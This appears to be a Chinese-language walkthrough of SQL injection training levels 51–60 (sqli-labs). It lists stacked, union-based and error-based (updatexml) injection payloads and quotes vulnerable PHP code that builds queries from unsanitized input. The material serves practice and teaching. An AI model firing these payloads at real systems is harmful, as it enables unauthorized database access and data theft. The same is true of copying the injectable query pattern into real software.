51
堆叠注入
payload:?sort=1%27;%20create%20table%20test51%20like%20users--+
52
堆叠注入
payload:?sort=username;%20create%20table%20test52%20like%20users;
53
堆叠注入
payload:?sort=1%27;%20create%20table%20test53%20like%20users;--+
54
?id=-1%27%20union%20select%201,database(),%273 //查库
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23 //查表
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='' //查列
?id=-1' union select 1,group_concat(secret_**),3 from ___%23 //查数据
55
payload:?id=1)
56
payload:?id=1')
57
payload:?id=1"
58
好像不能显示union数据,使用报错注入。
payload:?id=-1' and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
并没有直接从结果集返回数据,而是创建了一个新array从中取得结果集中的id然后返回数据。
59
payload:?id=-1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+
60
payload:?id=-2") and (updatexml(1,concat(0x7e,(select database()),0x7e),1))--+
文章评论